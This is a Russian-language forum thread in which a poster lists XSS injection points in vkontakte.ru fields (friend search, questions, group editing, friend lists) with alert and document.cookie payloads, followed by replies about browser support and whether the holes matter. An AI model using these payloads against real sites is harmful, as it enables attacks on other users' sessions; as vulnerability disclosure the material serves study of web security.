И так приступим !

1. XSS ~ заходим в приложение ---> добавить друзей ---> вбиваем <IMG SRC="javascript:alert('XSS');"> и нажимаем " Enter "
ой, хрень какая то :(

2. XSS ~ http://vkontakte.ru/questions.php ---> создать вопрос ---> <IMG SRC="javascript:alert(document.cookie);"> ( если не с работала, то просто редактируем и ставим этот же скрипт !
упс )

3. XSS ~ Заходим в свою группу ---> редактировать руководство ---> видем под админом " редактировать " вводим <IMG SRC="javascript:alert(document.cookie);"> ---> жмем Enter !
ну что это за приследование такое :(

4. XSS ~ http://vkontakte.ru/friends.php?id= ---> создать список ---> Введите название списка , найти друга ---> скрипт ---> Enter
уау!

5. XSS ~ где есть еще )) не помню...

P.S : Хотел вконтакту написать может голосов бы дали т.к. тяжкое финансовое положение ! :( Но подумал и решил " все в народ " ! :)

что нить из этого интересно работает ) По мне так ничего.

Работает... ТС, хакир штоле? Зачем спалил превад? :(

этому превату по скромным подсчетам более года

Нет, тогда бы уже прикрыли. Какой год, о чем ты? Списки недавно появились.

новые я их 23 числа нашел и сегдня кинул! Все XSS тока мои!

новые я их 23 числа нашел и сегдня кинул! Все XSS тока мои!
да че ты перживаешь то так ) нафик они никому не нужны.

сообщения такого вида не несут никакой информационной нагрузки, если такое повториться- подам заявку на бан т к удалил четыре похожих на это сообщение данного юзера
Kusto

В firefox неработает =\

В firefox неработает =\

Все работает ! Значит не так что то делаешь ;-)

____________

при чем тут нужны не нужны ?!

А в опере всё ок ;)

Еще в Мои Новости заходишь, "показывать новости некоторых друзей". Поле "имя друга" уязвимо.

UPD: Похоже, XSS во всех полях окошек с фильтрацией друзей.

толку от этих уязвимостей, они не сохраняются, это просто не фильтруются переменный в аяксе и все )

Я понимаю, что чужой труд лучше обосрать, чем самому ковыряться

ткни мне пальцем где я твой труд обосрал? ато не вижу чето. То что я написал что это не эффективно не значит что обосрал


по поводу труда, вот целая ветка трудящихся

http://forum.antichat.ru/forum74.html

А это так прогулка что ли ?

Всегда найдется тот кто будет цеплять...
Покажи мне пожалуйста реализацию хоть одной XSS их этих в деле.

Ладно, прекратите спорить. Нашел человек XSS - ему спасибо.

Посмотрите сколько тут гостей. Наверняка есть модераторы контакта или какие-нибудь знакомые Дурова, которые ему все донесут.

эти XSS бесполезные((но автору респект, что хоть чтото нашел )

странно, но еще не прикрыли )
там прикрывать нечего, это пасивки, тоже самое что написать челу "а не мог бы ты отдать мне пароль" или "если ты полный чайник в компах сделай это и это" ))) но как говорит FaS автору респект, как не крути старался